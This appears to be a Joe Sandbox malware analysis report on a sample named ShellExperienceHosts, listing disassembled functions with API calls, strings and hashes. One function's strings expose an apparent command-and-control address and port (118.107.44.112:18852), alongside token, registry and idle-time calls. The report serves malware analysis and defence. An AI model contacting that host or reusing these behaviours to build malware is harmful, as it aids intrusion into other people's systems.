                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                            • String ID: %d min
                                                                            • API String ID: 3754759880-1947832151
                                                                            • Opcode ID: 58e571fe12410f8a76c8b66b2b621d444396eda66629f44f0a889519f07594e6
                                                                            • Instruction ID: c0d896c876b3aae6883771e1017343bee50f2cb3b5414376149af277025395b7
                                                                            • Opcode Fuzzy Hash: 58e571fe12410f8a76c8b66b2b621d444396eda66629f44f0a889519f07594e6
                                                                            • Instruction Fuzzy Hash: CE4171B5D00228AFCB10DFA4DCC5A9FBBB8AF44710F098555F909AB255DB74AA04CBA1
                                                                            Function 03326910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(18F775C8,00000000,00000000,75BF73E0,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326938
                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326947
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326960
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 0332696B
                                                                            • SysStringLen.OLEAUT32(00000000), ref: 033269BE
                                                                            • SysStringLen.OLEAUT32(00000000), ref: 033269CC
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,033410DB,000000FF), ref: 03326A2E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,033410DB,000000FF), ref: 03326A34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                            • String ID:
                                                                            • API String ID: 429299433-0
                                                                            • Opcode ID: 5a5ea37fbe5f4cd646d7e7ab6318e392b50efb890375f2ba192a352a48cc5cc8
                                                                            • Instruction ID: 33b4e3b83c84e81ffab067fe7a05ac582690238a15310daa502c382dcedd87ce
                                                                            • Opcode Fuzzy Hash: 5a5ea37fbe5f4cd646d7e7ab6318e392b50efb890375f2ba192a352a48cc5cc8
                                                                            • Instruction Fuzzy Hash: A14195B6D406289BDB10DFA9CCC1AAEFBB8EF44710F144666E915F7241DB75A9008BA0
                                                                            Function 6C6D019C Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 593COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: &$&
                                                                            • API String ID: 0-3764684571
                                                                            • Opcode ID: f6de54bdfee6ca7f30285d22065f4728ca915e1a5d7c530d05b9c0429fe1e718
                                                                            • Instruction ID: 31133ccc4dd62a009e67bc04e013b2b68a625b5216aa1338f2e33e8b3bc29594
                                                                            • Opcode Fuzzy Hash: f6de54bdfee6ca7f30285d22065f4728ca915e1a5d7c530d05b9c0429fe1e718
                                                                            • Instruction Fuzzy Hash: 77220C72E150A48BDF28CF64CC547EDBBB2AF8631CF164268D41AB7780DB319D848B95
                                                                            Function 03326D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 03326DD9
                                                                            • RegOpenKeyExW.KERNEL32(80000001,03345164,00000000,00020019,75BF73E0), ref: 03326DFC
                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03326E4A
                                                                            • lstrcmpW.KERNEL32(?,03345148), ref: 03326E60
                                                                            • lstrcpyW.KERNEL32(033256EA,?), ref: 03326E72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                            • String ID: GROUP
                                                                            • API String ID: 2102619503-2593425013
                                                                            • Opcode ID: 1376c422c048385b61e908ac7839bd7f23ba989b30238f2489d63f26f8dccc93
                                                                            • Instruction ID: 3d52399bae6401eb00843c7633c9a591011bd7ba4febaffda3481a6d3daf787d
                                                                            • Opcode Fuzzy Hash: 1376c422c048385b61e908ac7839bd7f23ba989b30238f2489d63f26f8dccc93
                                                                            • Instruction Fuzzy Hash: 7C314775901329ABDB20DF90EDC9B9EB7B8FF08710F104699E515A7190DBB4AA44CF90
                                                                            Function 1000721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 10007240
                                                                            • __calloc_crt.LIBCMT ref: 1000724C
                                                                            • __getptd.LIBCMT ref: 10007259
                                                                            • CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
                                                                            • _free.LIBCMT ref: 100072A3
                                                                            • __dosmaperr.LIBCMT ref: 100072AE
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 155776804-0
                                                                            • Opcode ID: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                                                            • Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
                                                                            • Opcode Fuzzy Hash: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                                                            • Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0
                                                                            Function 0332FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0332FA4E
                                                                            • __calloc_crt.LIBCMT ref: 0332FA5A
                                                                            • __getptd.LIBCMT ref: 0332FA67
                                                                            • CreateThread.KERNEL32(00000000,00000000,0332F9C4,00000000,00000000,0332E003), ref: 0332FA9E
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,0332E003,00000000,00000000,03325F40,00000000,00000000,00000000), ref: 0332FAA8
                                                                            • _free.LIBCMT ref: 0332FAB1
                                                                            • __dosmaperr.LIBCMT ref: 0332FABC
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 155776804-0
                                                                            • Opcode ID: 5f979ed9adbf747f27abe598c30fd7caa1d622cc65e8ad470e5fc7864ff7b249
                                                                            • Instruction ID: 5da46513e30e3abed15a8a82cef7ed0f2483de71125f5b532a07519210339c89
                                                                            • Opcode Fuzzy Hash: 5f979ed9adbf747f27abe598c30fd7caa1d622cc65e8ad470e5fc7864ff7b249
                                                                            • Instruction Fuzzy Hash: F111A53A604726BFD711FFA9ECC099B7BA8DF06B70B158425F915DA150DB71D4018B60
                                                                            Function 03327410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03327523), ref: 0332743D
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03327444
                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 03327452
                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 0332745A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 3433367815-192647395
                                                                            • Opcode ID: 2695536ff9b25a0f9fc0009b4d2545807ab405ab4c8e27f413d420dcc7cbb1d4
                                                                            • Instruction ID: 0cd89c7da36b80a47999a1cce96725b501aef489086d8102e075194c9ad58680
                                                                            • Opcode Fuzzy Hash: 2695536ff9b25a0f9fc0009b4d2545807ab405ab4c8e27f413d420dcc7cbb1d4
                                                                            • Instruction Fuzzy Hash: 74012C74D002099FCF50DFB499846EEBFF9EB08300F5445A9E559E3241EB359A40CB61
                                                                            Function 6C7EA910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7EA917
                                                                              • Part of subcall function 6C80E632: EnterCriticalSection.KERNEL32(6C8F4FC8,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E663
                                                                              • Part of subcall function 6C80E632: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E679
                                                                              • Part of subcall function 6C80E632: LeaveCriticalSection.KERNEL32(6C8F4FC8,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E687
                                                                              • Part of subcall function 6C80E632: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E694
                                                                            • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C7EA96A
                                                                            • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C7EA980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                                            • String ID: DragDelay$DragMinDist$windows
                                                                            • API String ID: 3965097884-2101198082
                                                                            • Opcode ID: 8a8e69e64d54b29d5c63e6884407b1f7db860df806c41d4f6047c27c1f9be198
                                                                            • Instruction ID: 7b2e73fc1ac92bfdcb85fb81d858bd3652edd92665c86498b2c60268c818a10b
                                                                            • Opcode Fuzzy Hash: 8a8e69e64d54b29d5c63e6884407b1f7db860df806c41d4f6047c27c1f9be198
                                                                            • Instruction Fuzzy Hash: 7C014CB0A007009FDB719FB89B49B0A7AF4BB89709F542D2EE095C7B80E7749405CF44
                                                                            Function 100071B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                              • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                              • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                              • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                            • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                              • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                            • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                              • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                            • ExitThread.KERNEL32 ref: 100071EA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                            • __freefls@4.LIBCMT ref: 10007210
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 2383549826-0
                                                                            • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                            • Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
                                                                            • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                            • Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790
                                                                            Function 0332F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0332F9CA
                                                                              • Part of subcall function 03333CA0: TlsGetValue.KERNEL32(00000000,03333DF9,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000), ref: 03333CA9
                                                                              • Part of subcall function 03333CA0: DecodePointer.KERNEL32(?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000,?,03333F06,0000000D), ref: 03333CBB
                                                                              • Part of subcall function 03333CA0: TlsSetValue.KERNEL32(00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000,?,03333F06), ref: 03333CCA
                                                                            • ___fls_getvalue@4.LIBCMT ref: 0332F9D5
                                                                              • Part of subcall function 03333C80: TlsGetValue.KERNEL32(?,?,0332F9DA,00000000), ref: 03333C8E
                                                                            • ___fls_setvalue@8.LIBCMT ref: 0332F9E8
                                                                              • Part of subcall function 03333CD4: DecodePointer.KERNEL32(?,?,?,0332F9ED,00000000,?,00000000), ref: 03333CE5
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0332F9F1
                                                                            • ExitThread.KERNEL32 ref: 0332F9F8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332F9FE
                                                                            • __freefls@4.LIBCMT ref: 0332FA1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 2383549826-0
                                                                            • Opcode ID: 5bd88a527e9dc645eecfcba04124b2a5f19a3ef71d69438899e5e5347d37e66f
                                                                            • Instruction ID: b6519ad705a32c3f79bce4fa9c2731609880ebd76a045a60ac150e0f0b48437e
                                                                            • Opcode Fuzzy Hash: 5bd88a527e9dc645eecfcba04124b2a5f19a3ef71d69438899e5e5347d37e66f
                                                                            • Instruction Fuzzy Hash: CAF0497CA00710ABC708FF61C9C881E7FACAF8A250721C558E9099B211DB34E442CBA1
                                                                            Function 6C87313E Relevance: 9.3, APIs: 6, Instructions: 273COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C873543: CreateFileW.KERNEL32(?,00000000,?,6C8731E7,?,?,00000000,?,6C8731E7,?,0000000C), ref: 6C873560
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C873252
                                                                            • GetFileType.KERNEL32(00000000), ref: 6C873265
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C87326F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C873298
                                                                            • CloseHandle.KERNEL32(6C86A23C), ref: 6C8733E5
                                                                            • GetLastError.KERNEL32 ref: 6C873417
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                            • String ID:
                                                                            • API String ID: 3086256261-0
                                                                            • Opcode ID: c6c607367b8531938f379ccc30d35d9e8b6114e9f318495f2fb57cf3cf133533
                                                                            • Instruction ID: 4a0194b36405ba8b1b3556e39fd04f2b5abc5d86981e6e8f4eb1cb16f295aaa9
                                                                            • Opcode Fuzzy Hash: c6c607367b8531938f379ccc30d35d9e8b6114e9f318495f2fb57cf3cf133533
                                                                            • Instruction Fuzzy Hash: E3A13732A042589FCF39CF68DD41BAD3BB0AB07328F14056DE8119B790DB359D16CBA2
                                                                            Function 6C6D8986 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 447COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: 118.107.44.112$18852$IP=$Port=
                                                                            • API String ID: 4218353326-2395760147
                                                                            • Opcode ID: cf433627e59b37c0c44fa95c63a9d32e8be188ec3980bdb7daca868c3ac69d66
                                                                            • Instruction ID: d91d27950aabd67815fece574203c156ebe3d12686fe34b338159bad33ebeee5
                                                                            • Opcode Fuzzy Hash: cf433627e59b37c0c44fa95c63a9d32e8be188ec3980bdb7daca868c3ac69d66
                                                                            • Instruction Fuzzy Hash: 39F1C6B2A01B408BD334CF38C884A97B7F6BF99308F154A2ED49687B51E731F5458B95
                                                                            Function 100032E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
                                                                            • Sleep.KERNEL32(00000258), ref: 100032FE
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
                                                                            • Sleep.KERNEL32(0000012C), ref: 1000332B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 3137405945-0
                                                                            • Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                            • Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
                                                                            • Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                            • Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0
                                                                            Function 03326690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0332669B
                                                                            • CoCreateInstance.OLE32(033446FC,00000000,00000001,0334471C,?,?,?,?,?,?,?,?,?,?,0332588A), ref: 033266B2
                                                                            • SysFreeString.OLEAUT32(?), ref: 0332674C
                                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0332588A), ref: 0332677D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                            • String ID: FriendlyName
                                                                            • API String ID: 841178590-3623505368
                                                                            • Opcode ID: 69985a83d91823ebd5a704dec740f8f03bddefadfcef2e00411aaba72a1d4ece
                                                                            • Instruction ID: 4381652be6d85b7686f46d3dea7160d21f1f0731a6596df684e17ef328c9fac9
                                                                            • Opcode Fuzzy Hash: 69985a83d91823ebd5a704dec740f8f03bddefadfcef2e00411aaba72a1d4ece
                                                                            • Instruction Fuzzy Hash: AE311879600609AFDB00DB99DCC1EAEB7B9EF88704F148598F514EB254DBB1E9428B60
                                                                            Function 0332F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
